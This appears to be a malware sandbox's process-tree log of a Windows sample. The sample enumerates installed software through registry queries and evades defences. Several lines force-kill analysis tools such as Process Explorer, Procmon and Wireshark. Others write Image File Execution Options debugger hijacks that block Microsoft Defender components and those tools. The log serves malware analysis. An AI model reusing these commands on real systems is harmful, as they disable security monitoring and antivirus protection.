    [3] PID:1792  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    [3] PID:1960  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
  [2] PID:1888  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:2032  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    [3] PID:1480  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
  [2] PID:436  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
      - Kills process with taskkill
  [2] PID:1792  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:1140  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    [3] PID:832  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
  [2] PID:2052  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
      - Kills process with taskkill
  [2] PID:2064  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:2100  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
    [3] PID:2116  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
  [2] PID:2132  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:2184  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    [3] PID:2208  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
  [2] PID:2144  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
      - Kills process with taskkill
  [2] PID:2220  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:2232  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    [3] PID:2264  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
  [2] PID:2244  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
      - Kills process with taskkill
  [2] PID:2276  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:2292  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    [3] PID:2304  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
  [2] PID:2324  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:2344  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
    [3] PID:2368  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
  [2] PID:2392  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:2408  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    [3] PID:2488  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
  [2] PID:2432  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
      - Kills process with taskkill
  [2] PID:2512  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:2536  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    [3] PID:2568  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
  [2] PID:2592  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:2624  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
    [3] PID:2692  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
  [2] PID:2612  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
      - Kills process with taskkill
  [2] PID:2704  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:2716  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    [3] PID:2732  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
  [2] PID:2752  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
      - Kills process with taskkill
  [2] PID:2784  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:2800  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    [3] PID:2816  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
  [2] PID:2828  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:2852  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    [3] PID:2868  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
  [2] PID:2880  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:2916  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
    [3] PID:2932  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
  [2] PID:2892  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
      - Kills process with taskkill
  [2] PID:2960  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:2972  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64
    [3] PID:2988  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:32
  [2] PID:3008  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
      - Kills process with taskkill
  [2] PID:2032  C:\Windows\system32\cmd.exe  |  cmd.exe
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:2092
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:1584
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1572
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:1520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:2264
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2108
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2240
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2304
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2352
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:2132
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:2544
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2412
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2568
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2224
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2692
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:2824
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:520
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1332
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2840
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2916
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2932
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:276
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1804
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1496
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵PID:2788
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:3024
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1272
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵PID:1852
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:1776
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1088
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵PID:1920
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵PID:1924
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1936
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵PID:240
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵PID:1132
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2204
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵PID:1484
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵PID:560
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:792
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵PID:2000
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵PID:584
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:664
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵PID:1632
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:323⤵PID:1300
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1796
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:643⤵PID:2996
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:323⤵PID:2992
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1448
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:643⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:323⤵PID:1588
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3016
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:643⤵PID:3064
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:323⤵PID:580
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1660
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:643⤵PID:1800
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:323⤵PID:2120
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2364
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:643⤵PID:1876
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:323⤵PID:892
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1980
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:643⤵PID:2076
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:323⤵PID:2152
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2052
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:643⤵PID:2156
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:323⤵PID:2380
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2104
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:643⤵PID:2080
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:323⤵PID:2160
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1656
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:1888
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:1576
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2228
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:2300
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:2236
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1832
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:956
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:2548
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2368
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:643⤵PID:2248
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:323⤵PID:2320
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2244
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:2264
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:2688
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2504
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:643⤵PID:2520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:323⤵PID:2436
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2812
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:2752
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:2432
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2492
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:2332
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:2624
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2672
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:2644
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:2612
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2412
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:2324
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:2392
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2252
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:2296
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:2312
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2440
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:2284
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:2724
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2632
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:1528
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:2536
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2628
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:643⤵PID:2212
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:323⤵PID:1440
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1384
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:643⤵PID:3060
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:323⤵PID:2668
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1128
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:643⤵PID:2768
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:323⤵PID:2568
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2872
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:1332
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:2576
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2896
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:2952
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:2928
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:2968
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:2868
-
-